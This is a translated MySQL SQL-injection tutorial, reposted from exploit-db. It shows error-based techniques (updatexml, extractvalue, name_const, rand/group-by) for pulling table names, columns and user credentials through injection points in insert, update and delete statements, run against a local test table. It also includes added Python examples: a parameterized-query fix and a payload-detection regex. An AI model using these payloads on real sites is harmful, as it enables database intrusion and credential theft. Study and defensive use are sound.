    Extracting data via insert, update and delete injection

    0x00 Introduction


    When SQL injection is used to pull data out of a database, the methods fall roughly into union queries, error-based injection, boolean-based blind injection and time-based injection, and they are normally built on an injection point inside a select statement. So when we find an injection point inside an insert, update or delete statement (for example, sites that log visitors' browsing history, including referer, client_ip and user-agent, or features such as user registration, password change and record deletion), can the methods above still be used to obtain the data we want? Here we take MySQL with error display enabled as the example and look at how to extract the data we are after from insert, update and delete injection points.

    0x01 Environment setup


    To show the injection results more clearly, we first create the test data with the following statements:

    create database newdb;
    use newdb;
    create table users(
        id int(3) not null auto_increment,
        username varchar(20) not null,
        password varchar(20) not null,
        primary key (id)
    );
    insert into users values(1,'Jane','Eyre');
    


    The current data structure (shown in a screenshot in the original post): one table, users, with the columns id, username and password and a single row, (1, 'Jane', 'Eyre').

    0x02 Injection syntax


    Because we are working in error-display mode, the idea is to deliberately construct a syntax error inside the insert, update or delete statement, for example with the following statements:

    insert into users (id, username, password) values (2,''inject here'','Olivia');
    insert into users (id, username, password) values (2,""inject here"",'Olivia');
    


    Note: where the username field value belongs, we put 'inject here' and "inject here", two variants that trigger the error, one enclosed in single quotes and one in double quotes. Build the payload to match the quoting used at the actual injection point.
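The injection point in this section exists only because the application splices the username into the statement text. The following Python is an added example, not code from the original post; it uses sqlite3 in place of MySQL (so the injected updatexml() call fails as an unknown function rather than leaking version(), but the quote still terminates the literal) and shows the vulnerable string-built INSERT beside its parameterized form.

```python
import sqlite3

# Constructed demo: sqlite3 stands in for MySQL. It has no updatexml(), so the
# injected call fails as an unknown function instead of leaking version(), but
# the quote in the input still closes the literal and the rest is parsed as SQL.
UPDATEXML_PAYLOAD = "Olivia' or updatexml(1,concat(0x7e,(version())),0) or '"
PORTABLE_PAYLOAD = "Olivia' or 1 or '"   # pure-SQL variant: the expression evaluates to 1

def fresh_db():
    db = sqlite3.connect(":memory:")
    db.execute("create table users(id integer primary key, "
               "username text not null, password text not null)")
    db.execute("insert into users values(1,'Jane','Eyre')")
    return db

def insert_vulnerable(db, user_id, username, password):
    # The injection point from the post: input spliced into the string literal.
    sql = (f"INSERT INTO users (id, username, password) "
           f"VALUES ({user_id},'{username}','{password}')")
    try:
        db.execute(sql)
        return "ok"
    except sqlite3.OperationalError as exc:
        return f"error: {exc}"   # this text is what an error page would echo

def insert_safe(db, user_id, username, password):
    # Placeholders: the driver sends the value as data, never as SQL text.
    db.execute("INSERT INTO users (id, username, password) VALUES (?,?,?)",
               (user_id, username, password))
    return "ok"

def stored_username(db, user_id):
    row = db.execute("select username from users where id=?", (user_id,)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = fresh_db()
    # engine error, nothing stored: the payload reached the SQL parser
    print(insert_vulnerable(db, 2, UPDATEXML_PAYLOAD, "Nervo"), stored_username(db, 2))
    # the injected expression is evaluated and its result lands in the column
    print(insert_vulnerable(db, 3, PORTABLE_PAYLOAD, "Nervo"), stored_username(db, 3))
    # parameterized: the whole payload is stored verbatim as the username
    print(insert_safe(db, 4, UPDATEXML_PAYLOAD, "Nervo"), stored_username(db, 4))
```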

    0x03 Extracting data with updatexml()


    updatexml() is one of MySQL's XPath functions for querying and modifying XML document data.

    Payload:

    or updatexml(1,concat(0x7e,(version())),0) or
    

    Insert:

    INSERT INTO users (id, username, password) VALUES (2,'Olivia' or updatexml(1,concat(0x7e,(version())),0) or'', 'Nervo');
    


    Update:

    UPDATE users SET password='Nicky' or updatexml(2,concat(0x7e,(version())),0) or '' WHERE id=2 and username='Olivia';
    


    Delete:

    DELETE FROM users WHERE id=2 or updatexml(1,concat(0x7e,(version())),0) or'';
    


    Extracting data:

    For brevity, where the usage is the same for insert, update and delete I will only show the insert case.

    The payload used is:

    or updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1)),0) or
    

    [Screenshot: getting the table names of the newdb database]

    [Screenshot: getting the column names of the users table]

    [Screenshot: extracting the users table's data with insert]

    [Screenshot: extracting the users table's data with delete]

    We can use insert, update and delete statements to obtain the database's table names and column names, but update cannot be used to read data from the very table it is updating (MySQL rejects a subquery that selects from the target table of the update):

    [Screenshot: the error MySQL returns for that update case]

    To demonstrate extracting data with update, we temporarily create a students table with the columns id, name and address and insert one row:

    [Screenshot: creating the students table]

    Using update again to extract the users table's data:

    [Screenshot: users table data extracted through the update injection]

    If you run into an update injection and want the data of the table being updated, you can use a double query (subquery), which I cover later.

    0x04 Extracting data with extractvalue()


    extractvalue() is likewise one of MySQL's XPath functions for querying and modifying XML document data.

    Payload:

    or extractvalue(1,concat(0x7e,database())) or
    

    Insert:

    INSERT INTO users (id, username, password) VALUES (2,'Olivia' or extractvalue(1,concat(0x7e,database())) or'', 'Nervo');
    


    Update:

    UPDATE users SET password='Nicky' or extractvalue(1,concat(0x7e,database())) or'' WHERE id=2 and username='Nervo';
    


    Delete:

    DELETE FROM users WHERE id=1 or extractvalue(1,concat(0x7e,database())) or'';
    


    Extracting data:

    Again, where the usage is the same for insert, update and delete I only show the insert case.

    Getting the table names of the newdb database:

    INSERT INTO users (id, username, password) VALUES (2,'Olivia' or extractvalue(1,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 1,1))) or'', 'Nervo');
    


    Getting the column names of the users table:

    INSERT INTO users (id, username, password) VALUES (2,'Olivia' or extractvalue(1,concat(0x7e,(SELECT concat(column_name) FROM information_schema.columns WHERE table_name='users' limit 0,1))) or'', 'Nervo');
    


    Getting the users table's data:

    INSERT INTO users (id, username, password) VALUES (2,'Olivia' or extractvalue(1,concat(0x7e,(SELECT concat_ws(':',id, username, password) FROM users limit 0,1))) or '', 'Nervo');
    


    Again, insert, update and delete can all obtain the table names and column names, but update cannot read data from the table it is updating.

    0x05 Extracting data with name_const()


    name_const() was added in MySQL 5.0.12 and returns the value it is given. When used to produce a result set column, NAME_CONST() causes the column to take the given name.

    Payload:

    or (SELECT * FROM (SELECT(name_const(version(),1)),name_const(version(),1))a) or
    

    Insert:

    INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT * FROM (SELECT(name_const(version(),1)),name_const(version(),1))a) or '','Nervo');
    

    Update:

    UPDATE users SET password='Nicky' or (SELECT * FROM (SELECT(name_const(version(),1)),name_const(version(),1))a) or '' WHERE id=2 and username='Nervo';
    

    Delete:

    DELETE FROM users WHERE id=1 or (SELECT * FROM (SELECT(name_const(version(),1)),name_const(version(),1))a)or '';
    

    Extracting data:

    In current MySQL versions, name_const() can only be used to extract the database version. But in some older versions at or above 5.0.12 (5.0.12 included), more data can be extracted. Here I use MySQL 5.0.45 for the demonstration.

    First we run a simple SELECT to check whether data can be extracted at all:

    INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT*FROM(SELECT name_const((SELECT 2),1),name_const((SELECT 2),1))a) or '', 'Nervo');
    

    If the result is ERROR 1210 (HY000): Incorrect arguments to NAME_CONST, call it a night.

    If the result is ERROR 1060 (42S21): Duplicate column name '2', more data can be extracted.


    Getting the table names of the newdb database:

    INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT*FROM(SELECT name_const((SELECT table_name FROM information_schema.tables WHERE table_schema=database() limit 1,1),1),name_const(( SELECT table_name FROM information_schema.tables WHERE table_schema=database() limit 1,1),1))a) or '', 'Nervo');
    
    ERROR 1060 (42S21): Duplicate column name 'users'
    

    Getting the column names of the users table:

    INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT*FROM(SELECT name_const((SELECT column_name FROM information_schema.columns WHERE table_name='users' limit 0,1),1),name_const(( SELECT column_name FROM information_schema.columns WHERE table_name='users' limit 0,1),1))a) or '', 'Nervo');
    
    ERROR 1060 (42S21): Duplicate column name 'id'
    

    Getting the users table's data:

    INSERT INTO users (id, username, password) VALUES (2,'Olivia' or (SELECT*FROM(SELECT name_const((SELECT concat_ws(0x7e,id, username, password) FROM users limit 0,1),1),name_const(( SELECT concat_ws(0x7e,id, username, password) FROM users limit 0,1),1))a) or '', 'Nervo');
    
    ERROR 1060 (42S21): Duplicate column name '1~Jane~Eyre'
    

    0x06 Injection via subqueries


    The principle is the same as error-based injection in a select query: count(*) grouped by a value built from floor(rand(0)*2) makes MySQL raise a duplicate-key error that carries the selected data.

    Insert:

    INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or'', 'Nervo');
    


    Update:

    UPDATE users SET password='Nicky' or (SELECT 1 FROM(SELECT count(*),concat((SELECT(SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a)or'' WHERE id=2 and username='Nervo';
    


    Delete:

    DELETE FROM users WHERE id=1 or (SELECT 1 FROM(SELECT count(*),concat((SELECT(SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a)or'' ;
    


    Extracting data:

    Getting the table names of the newdb database:

    INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables WHERE table_schema=database() LIMIT 1,1)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or '','Nervo');
    


    Getting the column names of the users table:

    INSERT INTO users (id, username, password) VALUES (1, 'Olivia' or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns WHERE table_schema=database() AND table_name='users' LIMIT 0,1)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or '', 'Nervo');
    


    Getting the users table's data:

    INSERT INTO users (id, username, password) VALUES (1, 'Olivia' or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT (SELECT concat(0x7e,0x27,cast(users.username as char),0x27,0x7e) FROM `newdb`.users LIMIT 0,1) ) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or '', 'Nervo');
    


    0x07 More closing variants


    ' or (payload) or '
    ' and (payload) and '
    ' or (payload) and '
    ' or (payload) and '='
    '* (payload) *'
    " -- (payload) -- "
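From the defender's side, the payload shapes in this post are distinctive enough to flag in request logs or a WAF: the XPath functions, the name_const() pair, the floor(rand(0)*2) with group by trick, and the quote-closing glue listed above. The following Python is an added example, not from the original post; the signatures, the sample parameter values and the error-string list are constructed here for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed signatures for the error-based techniques in this post; not a
# vendor ruleset. Each is applied to the URL-decoded parameter value.
SIGNATURES = {
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "name_const": re.compile(r"\bname_const\s*\(", re.I),
    "rand_groupby": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\).*?group\s+by", re.I | re.S),
}
# Quote-closing glue from the list above: a quote, then or/and/*/--, then a
# parenthesis or a function call. This is what turns a literal into code.
CLOSER = re.compile(r"""['"]\s*(?:or|and|\*|--)\s*(?:\(|\w+\s*\()""", re.I)
# MySQL error text these payloads provoke when the application echoes it.
ERROR_LEAKS = re.compile(
    r"XPATH syntax error|Duplicate column name|Duplicate entry", re.I)

def classify_param(value):
    """Return the technique names matched in one request parameter value."""
    decoded = unquote_plus(value)
    hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    if hits and CLOSER.search(decoded):
        hits.append("quote_breakout")
    return hits

def response_leaks_error(body):
    """True if a response body carries one of the MySQL errors used above."""
    return bool(ERROR_LEAKS.search(body))

# Constructed sample parameter values, URL-encoded as a browser would send them.
SAMPLES = {
    "benign": "username=Jane",
    "xpath": "username=Olivia%27+or+updatexml%281%2Cconcat%280x7e%2C%28version%28%29%29%29%2C0%29+or+%27",
    "nameconst": "username=Olivia%27+or+%28SELECT+*+FROM+%28SELECT%28name_const%28version%28%29%2C1%29%29%2Cname_const%28version%28%29%2C1%29%29a%29+or+%27",
}

def scan_samples():
    """Map each sample name to the techniques found in its parameter value."""
    return {k: classify_param(v.split("=", 1)[1]) for k, v in SAMPLES.items()}

if __name__ == "__main__":
    for name, hits in scan_samples().items():
        print(f"{name:10s} {hits or '-'}")
```

Matching on the decoded value matters because the same payload arrives percent-encoded in a real request; a rule that looks at the raw query string misses it.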
    

    0x08 References


    http://dev.mysql.com/

    http://websec.ca/kb/sql_injection

    Source: http://www.exploit-db.com/wp-content/themes/exploit/docs/33253.pdf

    Reposted from: http://drops.wooyun.org/tips/2078
